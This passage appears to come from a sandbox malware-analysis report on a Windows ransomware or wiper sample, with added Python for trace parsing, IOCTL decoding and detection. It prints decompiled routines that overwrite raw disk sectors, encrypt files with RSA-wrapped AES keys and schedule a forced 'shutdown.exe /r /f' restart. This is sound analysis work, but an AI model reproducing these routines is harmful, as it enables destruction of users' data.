    								Sleep(0x3e8); // executed
    								L9:
    							} while (_t50 != 0);
    							goto L17;
    						}
    						L3:
    						_t30 = CreateNamedPipeW(_a4, 3, 6, 1, 0, 0, 0,  &_v28); // executed
    						_v8 = _t30;
    					}
    				}
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000008,00000014), ref: 011E7424
    • HeapAlloc.KERNEL32(00000000), ref: 011E7427
    • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 011E743B
    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 011E7450
    • CreateNamedPipeW.KERNELBASE(?,00000003,00000006,00000001,00000000,00000000,00000000,0000000C), ref: 011E746E
    • ConnectNamedPipe.KERNELBASE(00000000,00000000), ref: 011E747E
    • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 011E749E
    • Sleep.KERNELBASE(000003E8), ref: 011E74B2
    • GetProcessHeap.KERNEL32(00000008,?), ref: 011E74C3
    • HeapAlloc.KERNEL32(00000000), ref: 011E74C6
    • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 011E74E1
    • StrChrW.SHLWAPI(00000000,0000003A), ref: 011E74F6
      • Part of subcall function 011E6DE0: GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,00000001), ref: 011E6E15
      • Part of subcall function 011E6DE0: HeapAlloc.KERNEL32(00000000), ref: 011E6E1E
      • Part of subcall function 011E6DE0: memcpy.MSVCRT ref: 011E6E4B
      • Part of subcall function 011E6DE0: GetProcessHeap.KERNEL32(00000008,?), ref: 011E6E6F
      • Part of subcall function 011E6DE0: HeapAlloc.KERNEL32(00000000), ref: 011E6E72
      • Part of subcall function 011E6DE0: memcpy.MSVCRT ref: 011E6EA1
      • Part of subcall function 011E6DE0: GetProcessHeap.KERNEL32(00000000,?,002E6710,?,?), ref: 011E6EC1
      • Part of subcall function 011E6DE0: HeapFree.KERNEL32(00000000), ref: 011E6EC4
      • Part of subcall function 011E6DE0: GetProcessHeap.KERNEL32(00000000,?), ref: 011E6ECB
      • Part of subcall function 011E6DE0: HeapFree.KERNEL32(00000000), ref: 011E6ECE
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 011E7513
    • HeapFree.KERNEL32(00000000), ref: 011E7516
    • FlushFileBuffers.KERNEL32(?), ref: 011E751F
    • DisconnectNamedPipe.KERNEL32(?), ref: 011E7528
    • CloseHandle.KERNEL32(?), ref: 011E7531
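The APIs sections of this report are themselves a call trace with resolved arguments. The added Python example below (not part of the report or of the sample) parses lines in that format and applies three stateful checks a triage analyst would want from the calls listed above, in the E011E8CBF subcall under E011E8D5A and in E011E1B4E: a SetSecurityDescriptorDacl(sd, TRUE, NULL, FALSE) call, which leaves the object with no DACL at all so any local user can open the pipe created next; a raw \\.\PhysicalDriveN or \\.\X: handle opened with GENERIC_WRITE followed by WriteFile; and CryptGenKey with ALG_ID 0x660E, which is CALG_AES_128 (flags 1 = CRYPT_EXPORTABLE). The sample trace is assembled from lines printed in this report; their concatenation across functions is constructed.

```python
import re

# One call per line, in the "• Api.Module(args), ref: ADDR" form used by the APIs sections of this report.
CALL_RE = re.compile(r"^\s*•?\s*(?:Part of subcall function [0-9A-F]+: )?"
                     r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]+)\s*$")

GENERIC_WRITE = 0x40000000
RAW_DEVICE_RE = re.compile(r"^\\\\\.\\(PhysicalDrive\d+|[A-Za-z]:)$")   # \\.\PhysicalDriveN or \\.\C:
CALG_NAMES = {0x660E: "CALG_AES_128", 0x660F: "CALG_AES_192", 0x6610: "CALG_AES_256", 0xA400: "CALG_RSA_KEYX"}
CRYPT_EXPORTABLE = 0x1

def parse_trace(text):
    """Turn the report's call lines into dicts; lines that are not calls are ignored."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if m:
            args = m.group("args").split(",") if m.group("args") else []
            calls.append({"api": m.group("api"), "module": m.group("module"), "args": args, "ref": m.group("ref")})
    return calls

def _hex(arg):
    """Arguments the sandbox could not resolve are printed as '?'; treat them as unknown rather than zero."""
    try:
        return int(arg, 16)
    except ValueError:
        return None

def find_findings(calls):
    """Stateful rules over the call sequence. Returns one line per finding, tagged with the call address."""
    findings, null_dacl_at, raw_open_at = [], None, None
    for c in calls:
        api, args, ref = c["api"], c["args"], c["ref"]
        if api == "SetSecurityDescriptorDacl" and len(args) >= 3 and _hex(args[1]) == 1 and _hex(args[2]) == 0:
            null_dacl_at = ref        # bDaclPresent=TRUE with pDacl=NULL: no DACL at all, everyone gets full access
        elif api.startswith("CreateNamedPipe") and null_dacl_at:
            findings.append("%s: %s created with the NULL DACL set at %s (any local user can connect)"
                            % (ref, api, null_dacl_at))
        elif api in ("CreateFileA", "CreateFileW") and args and RAW_DEVICE_RE.match(args[0]):
            if (_hex(args[1]) or 0) & GENERIC_WRITE:
                raw_open_at = ref
                findings.append("%s: raw device %s opened with GENERIC_WRITE" % (ref, args[0]))
        elif api == "WriteFile" and raw_open_at:
            findings.append("%s: WriteFile after the raw open at %s (sector overwrite)" % (ref, raw_open_at))
            raw_open_at = None
        elif api == "CryptGenKey" and len(args) >= 3:
            alg = CALG_NAMES.get(_hex(args[1]), args[1])
            exportable = " CRYPT_EXPORTABLE" if (_hex(args[2]) or 0) & CRYPT_EXPORTABLE else ""
            findings.append("%s: CryptGenKey %s%s" % (ref, alg, exportable))
    return findings

# Lines copied from the APIs sections of this report (E011E73FD, the E011E8CBF subcall and E011E1B4E),
# joined into one constructed sequence for the demonstration.
SAMPLE_TRACE = r"""
• InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 011E743B
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 011E7450
• CreateNamedPipeW.KERNELBASE(?,00000003,00000006,00000001,00000000,00000000,00000000,0000000C), ref: 011E746E
• ConnectNamedPipe.KERNELBASE(00000000,00000000), ref: 011E747E
  • Part of subcall function 011E8CBF: CreateFileA.KERNEL32(\\.\PhysicalDrive0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 011E8CDB
  • Part of subcall function 011E8CBF: WriteFile.KERNEL32(00000000,?,011E8DFD,?,00000000), ref: 011E8D3C
  • Part of subcall function 011E1B4E: CryptGenKey.ADVAPI32(?,0000660E,00000001,?,?,Microsoft Enhanced RSA and AES Cryptographic Provider), ref: 011E1B66
"""
```

find_findings(parse_trace(SAMPLE_TRACE)) yields four lines: the world-accessible pipe at 011E746E (pointing back to 011E7450), the GENERIC_WRITE open of \\.\PhysicalDrive0, the WriteFile that follows it, and the exportable AES-128 key. The DACL rule is deliberately sequence-based: the descriptor is only dangerous once it is attached to an object, so the finding is raised at the CreateNamedPipeW, not at the SetSecurityDescriptorDacl.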
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    APIs
    • CryptStringToBinaryW.CRYPT32(89FF33FF,00000000,00000001,00000000,?,00000000,00000000,F0000000,?,?,?,?,011E1D43,?), ref: 011E1BC6
    • LocalAlloc.KERNEL32(00000040,?,Microsoft Enhanced RSA and AES Cryptographic Provider,?,?,?,011E1D43,?), ref: 011E1BD6
    • CryptStringToBinaryW.CRYPT32(MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+Y,00000000,00000001,00000000,?,00000000,00000000,?,?,?,011E1D43,?), ref: 011E1BF8
    • CryptDecodeObjectEx.CRYPT32(00010001,00000013,00000000,?,00000000,00000000,00000000,011E1D43,?,?,?,011E1D43,?), ref: 011E1C1A
    • LocalAlloc.KERNEL32(00000040,011E1D43,?,?,?,011E1D43,?), ref: 011E1C25
    • CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00000000,00000000,00000000,011E1D43,?,?,?,011E1D43,?), ref: 011E1C42
    • CryptImportKey.ADVAPI32(5708458B,?,011E1D43,00000000,00000000,011E1D4F,?,?,?,011E1D43,?), ref: 011E1C5A
    • LocalFree.KERNEL32(?,?,?,?,011E1D43,?), ref: 011E1C66
    • LocalFree.KERNEL32(?,?,?,?,011E1D43,?), ref: 011E1C6F
    Strings
    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 011E1BD0
    • MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+Y, xrefs: 011E1BF3
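Decoding the call chain above: CryptStringToBinaryW with dwFlags 1 (CRYPT_STRING_BASE64) turns the embedded text into DER, CryptDecodeObjectEx with encoding 0x10001 (X509_ASN_ENCODING | PKCS_7_ASN_ENCODING) and lpszStructType 19 (RSA_CSP_PUBLICKEYBLOB) converts the PKCS#1 RSAPublicKey into the PUBLICKEYBLOB layout (the first call with a NULL output buffer is the usual size query, the LocalAlloc in between sizes the buffer), and CryptImportKey loads the result into the provider acquired with "Microsoft Enhanced RSA and AES Cryptographic Provider". The added Python example below (not from the report or the sample) performs the same conversion without CryptoAPI and reads the DER headers of the key prefix exactly as the report prints it, which is enough to establish that the embedded modulus is 2048 bits; the round-trip key (n=3233, e=17) is a constructed toy value, not the sample's key.

```python
import base64
import struct

PUBLICKEYBLOB = 0x06
CUR_BLOB_VERSION = 0x02
CALG_RSA_KEYX = 0x0000A400
RSA1_MAGIC = 0x31415352          # "RSA1" little-endian, the magic of an RSAPUBKEY blob

def _der_length(n):
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def _der_integer(value):
    body = value.to_bytes(max(1, (value.bit_length() + 7) // 8), "big")
    if body[0] & 0x80:                   # keep the INTEGER positive
        body = b"\x00" + body
    return b"\x02" + _der_length(len(body)) + body

def der_encode_rsa_public_key(n, e):
    """PKCS#1 RSAPublicKey ::= SEQUENCE { modulus INTEGER, publicExponent INTEGER }."""
    body = _der_integer(n) + _der_integer(e)
    return b"\x30" + _der_length(len(body)) + body

def _read_tlv(buf, pos):
    """Returns (tag, length, offset-of-value) for the element at pos; handles short and long-form lengths."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        count = length & 0x7F
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    return tag, length, pos

def parse_pkcs1_public_key(der):
    tag, _, pos = _read_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("not a SEQUENCE")
    tag, length, pos = _read_tlv(der, pos)
    n = int.from_bytes(der[pos:pos + length], "big")
    pos += length
    tag, length, pos = _read_tlv(der, pos)
    e = int.from_bytes(der[pos:pos + length], "big")
    return n, e

def to_csp_publickeyblob(n, e):
    """Layout CryptImportKey expects: BLOBHEADER, RSAPUBKEY, then the modulus little-endian."""
    bitlen = ((n.bit_length() + 7) // 8) * 8
    header = struct.pack("<BBHI", PUBLICKEYBLOB, CUR_BLOB_VERSION, 0, CALG_RSA_KEYX)
    rsapubkey = struct.pack("<III", RSA1_MAGIC, bitlen, e)
    return header + rsapubkey + n.to_bytes(bitlen // 8, "little")

def describe_base64_der_prefix(prefix):
    """Reads the SEQUENCE and first INTEGER headers from the start of a base64 PKCS#1 key. Only whole
    base64 quartets are decoded, so a truncated string such as the one printed in this report works."""
    raw = base64.b64decode(prefix[:len(prefix) // 4 * 4])
    _, seq_len, pos = _read_tlv(raw, 0)
    _, int_len, pos = _read_tlv(raw, pos)
    if raw[pos] == 0:                    # leading zero of a positive INTEGER
        int_len -= 1
    return {"sequence_length": seq_len, "modulus_bits": int_len * 8}

# The embedded key exactly as the report prints it (truncated by the report itself).
REPORT_KEY_PREFIX = ("MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV"
                     "/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+Y")
```

describe_base64_der_prefix(REPORT_KEY_PREFIX) returns a SEQUENCE length of 0x10a and a 256-byte modulus, i.e. RSA-2048 (the familiar "MIIBCgKCAQEA" opening is exactly that header). The blob builder shows what CryptDecodeObjectEx produced for CryptImportKey: a BLOBHEADER with bType 6 and aiKeyAlg CALG_RSA_KEYX, the "RSA1" magic, the key size in bits and the public exponent, followed by the modulus reversed to little-endian.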
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E84DF() {
    				struct _SYSTEMTIME _v20;
    				short _v1580;
    				short _v1582;
    				short _v3628;
    				void* _t23;
    				signed int _t24;
    				short _t40;
    				WCHAR* _t41;
    				short _t44;
    				signed int _t45;
    				signed int _t53;
    				signed int _t54;
    				void* _t56;
    
    				_t44 = 0;
    				GetLocalTime( &_v20);
    				_t23 = E011E6973();
    				if(_t23 < 0xa) {
    					_t23 = 0xa;
    				}
    				_t45 = 0x3c;
    				_t24 = _t23 + 3;
    				_t54 = 0x18;
    				_t56 = (_v20.wMinute & 0x0000ffff) + _t24 % _t45;
    				_t53 = ((_v20.wHour & 0x0000ffff) + _t24 / _t45) % _t54;
    				if(GetSystemDirectoryW( &_v1580, 0x30c) != 0 && PathAppendW( &_v1580, L"shutdown.exe /r /f") != 0) {
    					if(E011E8494() == 0) {
    						wsprintfW( &_v3628, L"at %02d:%02d %ws", _t53, _t56,  &_v1580);
    					} else {
    						_t41 = L"/RU \"SYSTEM\" ";
    						if(( *0x11ff144 & 0x00000004) == 0) {
    							_t41 = 0x11f4388;
    						}
    						wsprintfW( &_v3628, L"schtasks %ws/Create /SC once /TN \"\" /TR \"%ws\" /ST %02d:%02d", _t41,  &_v1580, _t53, _t56);
    					}
    					_v1582 = 0;
    					_t40 = E011E83BD( &_v3628, 0); // executed
    					_t44 = _t40;
    				}
    				return _t44;
    			}
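The restart time and the two command lines of E011E84DF, worked through in an added Python example (not the report's or the sample's code). The minute arithmetic is reproduced as decompiled: the delay is added to wMinute without a modulo and without carrying into the hour, so a run at 22:50 with the minimum delay asks for 22:63. The string at 0x11f4388, used when bit 2 of the flag at 0x11ff144 is clear, is not printed in the report and is assumed empty here; the GetVersionExW decision made in E011E8494 is passed in as a boolean. The detector at the end matches either generated form against constructed process command lines.

```python
import re

def reboot_time(local_hour, local_minute, tick_minutes):
    """The arithmetic of E011E84DF as decompiled: a GetTickCount-derived minute count (E011E6973) is floored
    at 10 and 3 is added; the minute part is added to wMinute without a modulo and without carrying into
    the hour, so the result can be an invalid time such as 22:63."""
    delay = max(tick_minutes, 10) + 3
    minute = local_minute + delay % 60
    hour = (local_hour + delay // 60) % 24
    return hour, minute

def is_valid_hhmm(hour, minute):
    return 0 <= hour < 24 and 0 <= minute < 60

def build_command(system_dir, hour, minute, use_schtasks, run_as_system):
    """The two wsprintfW formats from the listing. E011E8494 (GetVersionExW) chooses between them; the
    string at 0x11f4388 used when the /RU option is not taken is not shown in the report and is assumed
    to be empty here."""
    target = system_dir.rstrip("\\") + "\\shutdown.exe /r /f"           # PathAppendW
    if not use_schtasks:
        return "at %02d:%02d %s" % (hour, minute, target)
    ru = '/RU "SYSTEM" ' if run_as_system else ""
    return 'schtasks %s/Create /SC once /TN "" /TR "%s" /ST %02d:%02d' % (ru, target, hour, minute)

# Detection: a one-shot task or at-job whose action is a forced restart, in either of the two forms above.
SCHTASKS_REBOOT_RE = re.compile(
    r'schtasks\b.*\s/Create\b.*\s/TR\s+"[^"]*shutdown\.exe\s+/r\s+/f[^"]*".*\s/ST\s+\d{1,2}:\d{2}', re.I)
AT_REBOOT_RE = re.compile(r'^\s*at\s+\d{1,2}:\d{2}\s+.*shutdown\.exe\s+/r\s+/f', re.I)

def is_scheduled_forced_reboot(command_line):
    return bool(SCHTASKS_REBOOT_RE.search(command_line) or AT_REBOOT_RE.search(command_line))

# Constructed process command lines (not from the sandbox run) for the detector: the two generated
# forms, a benign scheduled task and an immediate restart that is not scheduled at all.
SAMPLE_COMMAND_LINES = [
    build_command("C:\\Windows\\system32", *reboot_time(22, 50, 5), use_schtasks=True, run_as_system=True),
    build_command("C:\\Windows\\system32", *reboot_time(23, 10, 120), use_schtasks=False, run_as_system=False),
    'schtasks /Create /SC daily /TN "Backup" /TR "C:\\tools\\backup.exe" /ST 02:00',
    "shutdown.exe /r /t 0",
]
```

reboot_time(22, 50, 5) gives (22, 63), which is_valid_hhmm rejects, while reboot_time(23, 10, 120) carries into the next day correctly on the hour side because the 60-minute quotient is added there; only the remainder lacks the carry. The detector keys on the combination of /Create, a /TR action containing shutdown.exe /r /f and a /ST time, so an ordinary backup task and a direct shutdown.exe call are not flagged.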

    APIs
    • GetLocalTime.KERNEL32(?,00000000), ref: 011E84F1
      • Part of subcall function 011E6973: GetTickCount.KERNEL32(011E84FC), ref: 011E6973
    • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 011E8533
    • PathAppendW.SHLWAPI(?,shutdown.exe /r /f), ref: 011E854D
      • Part of subcall function 011E8494: memset.MSVCRT ref: 011E84AD
      • Part of subcall function 011E8494: GetVersionExW.KERNEL32(?,?,?,00000000), ref: 011E84C6
    • wsprintfW.USER32 ref: 011E8589
    • wsprintfW.USER32 ref: 011E85A9
      • Part of subcall function 011E83BD: wsprintfW.USER32 ref: 011E83DC
      • Part of subcall function 011E83BD: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 011E8400
      • Part of subcall function 011E83BD: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 011E8412
      • Part of subcall function 011E83BD: lstrcatW.KERNEL32(?,\cmd.exe), ref: 011E8428
      • Part of subcall function 011E83BD: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 011E846F
      • Part of subcall function 011E83BD: Sleep.KERNELBASE(011E85C7), ref: 011E8485
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E8D5A(void* __ecx) {
    				signed int _v8;
    				void _v28;
    				long _v32;
    				void* _t8;
    				void* _t9;
    				int _t12;
    				void* _t23;
    				void* _t24;
    				void* _t26;
    
    				_t24 = __ecx;
    				_t8 = CreateFileA("\\\\.\\C:", 0x40000000, 3, 0, 3, 0, 0); // executed
    				_t26 = _t8;
    				if(_t26 != 0) {
    					_t12 = DeviceIoControl(_t26, 0x70000, 0, 0,  &_v28, 0x18,  &_v32, 0); // executed
    					if(_t12 != 0) {
    						_t23 = LocalAlloc(0, _v8 * 0xa);
    						if(_t23 != 0) {
    							SetFilePointer(_t26, _v8, 0, 0); // executed
    							WriteFile(_t26, _t23, _v8,  &_v32, 0); // executed
    							LocalFree(_t23);
    						}
    					}
    					CloseHandle(_t26);
    				}
    				if(( *0x11ff104 & 0x00000008) == 0) {
    					L7:
    					_t9 = E011E8CBF();
    					goto L8;
    				} else {
    					_t9 = E011E14A9(_t24); // executed
    					if(_t9 == 0) {
    						L8:
    						return _t9;
    					}
    					goto L7;
    				}
    			}
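The device control codes in E011E1038 and E011E8D5A (and in the E011E8CBF subcall listed below), decoded with an added Python example that is not part of the report or of the sample. The fields come from the CTL_CODE layout in winioctl.h; the sample output buffers are constructed, not captured. The structure offsets explain two reads in the listings: _v88 in E011E1038 is offset 8 of the 0x20-byte VOLUME_DISK_EXTENTS buffer, the DiskNumber of the first extent that is then passed to _itoa, and _v8 in E011E8D5A is offset 20 of the 0x18-byte DISK_GEOMETRY buffer, BytesPerSector, which sets both the seek offset and the write length of the WriteFile that follows. Note also that E011E8D5A compares the CreateFileA result with 0 rather than with INVALID_HANDLE_VALUE (0xffffffff), the check E011E1038 uses, so a failed open still reaches DeviceIoControl.

```python
import struct

# Bit layout of a Windows I/O control code, from the CTL_CODE macro in winioctl.h:
#   bits 31..16 device type, 15..14 required access, 13..2 function number, 1..0 transfer method
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT", 2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS", 2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
DEVICE_TYPES = {0x07: "FILE_DEVICE_DISK", 0x09: "FILE_DEVICE_FILE_SYSTEM", 0x56: "FILE_DEVICE_VOLUME"}
# The three control codes that occur in this report, named per winioctl.h
KNOWN_IOCTLS = {
    0x560000: "IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS",
    0x070000: "IOCTL_DISK_GET_DRIVE_GEOMETRY",
    0x090020: "FSCTL_DISMOUNT_VOLUME",
}

def decode_ioctl(code):
    """Split a control code into its CTL_CODE fields and attach the name if it is one of the known codes."""
    return {
        "device_type": DEVICE_TYPES.get(code >> 16, hex(code >> 16)),
        "access": ACCESS[(code >> 14) & 3],
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 3],
        "name": KNOWN_IOCTLS.get(code),
    }

def parse_disk_geometry(buf):
    """DISK_GEOMETRY (24 bytes): the 0x18-byte output buffer of IOCTL_DISK_GET_DRIVE_GEOMETRY in E011E8D5A.
    BytesPerSector is the last dword, offset 20, which the listing reads as _v8 (= &_v28 + 20)."""
    cylinders, media_type, tracks, sectors, bytes_per_sector = struct.unpack_from("<qiIII", buf, 0)
    return {"cylinders": cylinders, "media_type": media_type, "tracks_per_cylinder": tracks,
            "sectors_per_track": sectors, "bytes_per_sector": bytes_per_sector}

def parse_volume_disk_extents(buf):
    """VOLUME_DISK_EXTENTS with one DISK_EXTENT (32 bytes): the 0x20-byte output buffer in E011E1038.
    DiskNumber sits at offset 8, the field the listing reads as _v88 (= &_v96 + 8) and passes to _itoa."""
    count, disk_number, start, length = struct.unpack_from("<I4xI4xqq", buf, 0)
    return {"extent_count": count, "disk_number": disk_number, "starting_offset": start, "extent_length": length}

def raw_write_plan(bytes_per_sector):
    """Offset and length of the WriteFile in E011E8D5A: SetFilePointer(h, BytesPerSector, 0, FILE_BEGIN)
    followed by a write of BytesPerSector * 10 bytes, i.e. sectors 1..10 of the volume, from a
    LocalAlloc(0, ...) buffer whose contents are never initialised."""
    return {"offset": bytes_per_sector, "length": bytes_per_sector * 10, "sectors": list(range(1, 11))}

def hresult_from_win32(err):
    """The (err & 0xffff) | 0x80070000 mapping E011E1038 applies to GetLastError() results. The constant
    0x8007007A it stores when the assembled path would exceed 0x104 bytes is ERROR_INSUFFICIENT_BUFFER (122)."""
    return (err & 0xFFFF) | 0x80070000 if err > 0 else err

# Constructed sample buffers (not captured from the sandbox run): a fixed disk with 512-byte sectors and
# a single-extent volume on disk 0 that starts 1 MiB into it.
SAMPLE_GEOMETRY = struct.pack("<qiIII", 1305, 12, 255, 63, 512)
SAMPLE_EXTENTS = struct.pack("<I4xI4xqq", 1, 0, 0x100000, 0xFFF00000)
```

decode_ioctl(0x560000) resolves to FILE_DEVICE_VOLUME, function 0, METHOD_BUFFERED; 0x70000 is FILE_DEVICE_DISK with the same function and method; 0x90020 is FILE_DEVICE_FILE_SYSTEM function 8, the dismount request the E011E8CBF subcall issues before its WriteFile. With a 512-byte sector the raw_write_plan covers bytes 512..5631 of \\.\C:, the sectors directly after the volume boot sector.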

    APIs
    • CreateFileA.KERNEL32(\\.\C:,40000000,00000003,00000000,00000003,00000000,00000000), ref: 011E8D79
    • DeviceIoControl.KERNEL32(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 011E8D9A
    • LocalAlloc.KERNEL32(00000000,?), ref: 011E8DAD
    • SetFilePointer.KERNELBASE(00000000,?,00000000,00000000), ref: 011E8DC0
    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 011E8DD2
    • LocalFree.KERNEL32(00000000), ref: 011E8DD9
    • CloseHandle.KERNEL32(00000000), ref: 011E8DE0
      • Part of subcall function 011E8CBF: CreateFileA.KERNEL32(\\.\PhysicalDrive0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 011E8CDB
      • Part of subcall function 011E8CBF: DeviceIoControl.KERNEL32(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 011E8D04
      • Part of subcall function 011E8CBF: LocalAlloc.KERNEL32(00000000,011E8DFD,?,?,?,?,?,?,?,011E8DFD), ref: 011E8D0E
      • Part of subcall function 011E8CBF: DeviceIoControl.KERNEL32(00000000,00090020,00000000,00000000,00000000,00000000,?,00000000), ref: 011E8D2A
      • Part of subcall function 011E8CBF: WriteFile.KERNEL32(00000000,?,011E8DFD,?,00000000), ref: 011E8D3C
      • Part of subcall function 011E8CBF: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,011E8DFD), ref: 011E8D45
      • Part of subcall function 011E8CBF: CloseHandle.KERNEL32(00000000), ref: 011E8D4C
      • Part of subcall function 011E14A9: memset.MSVCRT ref: 011E14CB
      • Part of subcall function 011E14A9: memset.MSVCRT ref: 011E14E8
      • Part of subcall function 011E14A9: memset.MSVCRT ref: 011E1500
      • Part of subcall function 011E14A9: memset.MSVCRT ref: 011E1518
      • Part of subcall function 011E14A9: memset.MSVCRT ref: 011E1530
      • Part of subcall function 011E14A9: memset.MSVCRT ref: 011E1549
      • Part of subcall function 011E14A9: memset.MSVCRT ref: 011E155C
      • Part of subcall function 011E14A9: memset.MSVCRT ref: 011E1670
      • Part of subcall function 011E14A9: memcpy.MSVCRT ref: 011E16C3
      • Part of subcall function 011E14A9: memcpy.MSVCRT ref: 011E16FC
      • Part of subcall function 011E14A9: memcpy.MSVCRT ref: 011E1762
      • Part of subcall function 011E14A9: memcpy.MSVCRT ref: 011E17F4
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 72%
    			E011E189A(long _a4, intOrPtr _a8) {
    				long _v8;
    				void* _v12;
    				void* _v16;
    				intOrPtr _v24;
    				unsigned int _v28;
    				void* _t21;
    				unsigned int _t23;
    				void* _t25;
    				void* _t27;
    				long _t35;
    				void* _t36;
    				void* _t37;
    				intOrPtr _t40;
    
    				_t21 = CreateFileW(_a4, 0xc0000000, 0, 0, 3, 0, 0); // executed
    				_t36 = _t21;
    				_v16 = _t36;
    				if(_t36 != 0xffffffff) {
    					__imp__GetFileSizeEx(_t36,  &_v28);
    					_v8 = 0;
    					_t40 = _v24;
    					if(_t40 < 0 || _t40 <= 0 && _v28 <= 0x100000) {
    						_t23 = _v28;
    						_a4 = _t23;
    						_v8 = 1;
    						_t35 = (_t23 >> 4) + 1 << 4;
    					} else {
    						_a4 = 0x100000;
    						_t35 = 0x100000;
    					}
    					_t25 = CreateFileMappingW(_t36, 0, 4, 0, _t35, 0); // executed
    					_v12 = _t25;
    					if(_t25 != 0) {
    						_t27 = MapViewOfFile(_t25, 6, 0, 0, _a4); // executed
    						_t37 = _t27;
    						if(_t37 != 0) {
    							_t30 = _a8;
    							_t13 = _t30 + 0x14; // 0xfffffffe
    							__imp__CryptEncrypt( *_t13, 0, _v8, 0, _t37,  &_a4, _t35);
    							if(_a8 != 0) {
    								FlushViewOfFile(_t37, _a4);
    							}
    							UnmapViewOfFile(_t37);
    						}
    						CloseHandle(_v12);
    					}
    					return CloseHandle(_v16);
    				}
    				return _t21;
    			}
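The size logic of E011E189A, in an added Python example (not the report's or the sample's code), and what it means for recovery. The constants come from the listing: 0x100000 as the cut-off, ((size >> 4) + 1) << 4 as the mapping length, Final = 1 only on the small-file path, and GENERIC_READ | GENERIC_WRITE (0xc0000000), PAGE_READWRITE (4) and FILE_MAP_READ | FILE_MAP_WRITE (6) for the handle and the mapping. The 16-byte block follows from the CALG_AES_128 key (0x660E) that E011E1B4E generates, as listed under the subcall APIs; the mode and padding set through KP_MODE (4) and KP_PADDING (3) are not printed in the report, and the example assumes the CryptoAPI defaults of CBC with PKCS#5 padding, which is exactly what the extra block in the mapping length provides for.

```python
MAX_IN_PLACE = 0x100000      # 1 MiB, the cut-off compared against the size's low dword
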